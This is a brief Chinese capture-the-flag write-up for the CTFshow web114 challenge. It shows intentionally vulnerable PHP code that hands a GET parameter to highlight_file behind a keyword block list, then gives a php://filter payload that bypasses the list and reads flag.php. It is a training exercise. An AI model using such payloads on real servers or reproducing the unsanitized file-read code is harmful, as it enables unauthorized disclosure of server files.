目錄

• 源碼
• 思路
• 題解
• 總結(jié)

---

源碼

<?php/* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 15:02:53*/error_reporting(0); highlight_file(__FILE__); function filter($file){if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){die('hacker!');}else{return $file;} } $file=$_GET['file']; echo "師傅們居然tql都是非預期 哼！"; if(! is_file($file)){highlight_file(filter($file)); }else{echo "hacker!"; } 師傅們居然tql都是非預期 哼！

---

思路

發(fā)現(xiàn)可以用filter,直接php://filter/resource=flag.php,中間的是可選的可以不寫

題解

?file=php://filter/resource=flag.php

---

總結(jié)

水題

總結(jié)

以上是生活随笔為你收集整理的CTFshow php特性 web114的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。